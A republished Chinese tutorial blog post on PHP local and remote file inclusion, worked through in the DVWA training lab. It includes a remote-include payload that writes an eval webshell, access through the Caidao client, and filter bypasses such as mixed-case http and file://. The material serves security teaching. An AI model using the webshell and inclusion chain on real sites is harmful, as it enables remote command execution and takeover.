标签：文件 包含 Inclusion 級別 DVWA 漏洞 include

文件包含漏洞原理介绍
在通过PHP的相应函数（比如include()）引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。
文件包含漏洞的形成，需要满足两个条件：
include()等函数通过动态变量的方式引入需要包含的文件
用户能够控制这个动态变量

本地文件包含(LFI)

• 能够读取或执行包含本地文件的漏洞，称为本地文件包含漏洞。

远程文件包含(RFI)

• 如果php.ini的配置选项allow_url_include为ON的话，文件包含函数是可以加载远程文件的，这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞，可以直接执行任意命令。

文件包含漏洞高危函数

• include()
• require()
• include_once()
• require_once()
• 对文件进行操作的其他函数，如f_open(),f_read()

文件包含漏洞危害

1. 敏感信息泄露
2. 获取Webshell
3. 任意命令执行

实验环境：

• PHPstudy
• DVWA靶场
• 菜刀

环境搭建

打开php的配置文件，搜索allow_url_include，把off换成on，然后重启

模拟实验

DVWA Securitylow級別

low级别源码

本地文件包含(LFI)

1、点击File Inclusion中的file1.php

2、在图示位置输入C:\Windows\System32\drivers\etc\hosts就可以看到hosts里的内容了

远程文件包含(RFI)

1、查看本机IP

2、在www目录下创建一个内容为<?php phpinfo();?>的txt文件

3、在浏览器中输入IP和创建的文件，内容只显示不执行

4、复制URL，粘贴到DVWA的page=下，能够执行

5、将txt内容改为<?php $file = fopen("a.php","w");fputs($file,'<?php @eval($_REQUEST[666]);?>')?>，然后刷新页面

6、在fi后加入a.php?666=phpinfo();可以正常显示

7、复制地址http://192.168.1.4/DVWA-master/vulnerabilities/fi/a.php

8、打开菜刀添加网址，输入666密码连接

9、点击添加的连接对象，成功进入

DVWA SecurityMedium級別

Medium級別源码

本地文件包含(LFI)

这里与低级别一样C:\Windows\System32\drivers\etc\hosts路径能够正常执行

远程文件包含(RFI)

这里只需把http、https掺入大小写即可

DVWA SecurityHigh級別

High級別源码

本地文件包含(LFI)

这里利用file://即可实现绕过

标签：文件,包含,Inclusion,級別,DVWA,漏洞,include
来源： https://blog.51cto.com/u_15274949/2922443

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。